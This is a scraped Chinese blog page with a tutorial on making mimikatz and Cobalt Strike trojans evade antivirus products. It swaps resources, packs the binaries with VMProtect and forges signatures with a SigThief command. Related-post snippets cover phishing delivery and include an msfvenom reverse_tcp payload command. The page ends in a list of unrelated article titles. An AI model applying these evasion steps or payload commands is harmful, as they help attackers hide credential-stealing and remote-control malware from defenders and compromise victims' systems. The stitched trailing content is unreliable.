实用cs、mimikatz免杀virscan
目录
免杀准备工具:
一、免杀mimikatz
二、免杀CS
web安全学习了解:web渗透测试
官网:宣紫科技
免杀准备工具:
Restorator
SigThief
VMProtect壳
一、免杀mimikatz
准备工具:mimikatz
第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。)
将原有的图标及版本资源删除后拖入附带资源的图标及版本。保存mimikatz。
简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。
成功绕过火绒,此处壳需要注意最好购买定期跟随官方一起更新。
二、免杀CS
准备工具:CS客户端
使用cs生成木马后,与免杀mimikatz同样选择资源。
替换版本及图标资源后,需要给软件上数字签名(正儿八经的软件签名我们没有,可以copy别的软件做伪签名)。使用SigThief
sigthief.py -i 软件文件名 -t 木马文件名 -o 输出位置(此处由于软件从虚拟机中考出有问题,无图)。在该基础上继续加壳即可免杀。
实用cs、mimikatz免杀virscan相关推荐
- mimikatz免杀过360和火绒
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网.也可以通过明文密码或者hash值 ...
- Flash钓鱼->CS上线(免杀过火绒、360等)
先看结果 访问钓鱼页面: 点击立即升级即把马儿下载下来了 这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了 双击运行,查看效果: 首先CS是没东西 ...
- 艰难的mimikatz源码编译免杀 Windows Defender
微信公众号:乌鸦安全 扫取二维码获取更多信息! 说明 本文周一的时候,工具就已经上传GitHub了,所以工具应该是已经失效了!!!仅供参考! 本文mimikatz源码编译未能免杀Windows Def ...
- 利用Ladon实现C2免杀所有杀软
前言 写了几篇无回显命令执行漏洞Ladon回显方法,接下来我们它升级,既然我们可以通过漏洞执行无回显命令都可以得到回显,那么我们自己写的程序不是更轻而易举吗?所谓远控不过就是通过各种协议传输攻击者的操 ...
- 远控免杀专题文章(1)-基础篇
脉搏文库 TideSec [](javascript:void(0)) 2020-02-20 6,218 *前**言* 一直是从事web安全多一些,对waf绕过还稍微有些研究,但是对远控免杀的认知还大 ...
- 红队免杀培训第一章-不可执行的shellcode
临近全国hw,后面会陆续推出红队免杀培训文章,希望能到诸君能在赛场上乱免,不会把现成的加载器放出来,但是例子改一下就是一个好的加载器,强调一遍,免杀并不是一种技术的一支独秀,而是百花齐放! 前言: ...
- 内网渗透-常用工具免杀
内网渗透-常用工具免杀 Mimikatz免杀 Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证.票证传递.hash传递.甚至伪造域管理凭证令牌等诸多功能.由于mimikatz的使用说明网 ...
- 052 木马免杀全攻略
木马免杀全攻略 转载自:a1pass.blog.163.com 2007-12-07 14:02:24| 分类: 思绪燃星火--技 | 标签:黑客 杂志刊物 作者:A1Pass 出处:http://a ...
- 钓鱼篇-利用RLO隐藏exe文件捆绑office免杀-远程模板加载上线CS
RLO伪装图片执行 利用msf生成木马x.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 ...
最新文章
- linux系统开机报错,linux开机报错故障
- 【Groovy】MOP 元对象协议与元编程 ( 使用 Groovy 元编程进行函数拦截 | 重写 MetaClass#invokeMethod 方法拦截 JDK 中已经定义的函数 )
- 微信跳转手机默认浏览器打开的实现方式
- 终极Java日志字典:开发人员最常记录的单词是什么?
- selenium学习过程中遇到的问题
- 玩嗨的 2 亿快手“老铁”和幕后的极致视觉算法
- 如何在vue项目中使用md5加密
- 联想ghost重装系统_【一键ghost装系统教程】一键ghost重装系统_一键ghost安装教程...
- 「管理数学基础」1.4 矩阵理论:相似矩阵
- web前端知识——常见布局方案、文章排版、图片排版、某宝列表
- 域名未授权 / 该网站未授权,禁止使用 解决办法:
- 树莓派学习笔记——串口与摄像头
- Python 一键导出微信阅读记录和笔记!
- 鸿蒙喜欢吃什么,巴西龟吃什么食物,一般一天喂几次?
- 小白算法积累——单链表6#带头结点单链表+递增有序
- Python 3 条件判断和循环语句,list、tuple、dict、set容器,部分函数
- 2023第十届大唐杯省赛心得体会总结
- Python全栈 Web(Django框架、模板继承、模型)
- 基于matlab_simulink的捷联惯性导航系统仿真,基于MATLABSimulink的捷联惯性导航仿真.pdf...
- 阿里云访问不到网站问题
热门文章
- Geospatial
- android app初始化sdk,Android SDK使用系列教程——2.SDK初始化和常用类介绍
- 2020年 Moore majority vote algorithm 摩尔投票法知多少
- 词云python_如何建立关键字词库,怎么增加网站关键词库?
- ECharts合并地图上的区域(济南市合并莱芜市)
- 极简魔力赏模拟器,戒掉魔力赏!(池子为苹果手机的)
- 生理周期python
- 【MySQL】MySQL启库失败故障处理两则
- 聚酞菁钴(CoPPc)磺化酞菁钴 聚酞菁钴CAS: 1154579-82-4
- pdm图纸管理系统可以实现哪些功能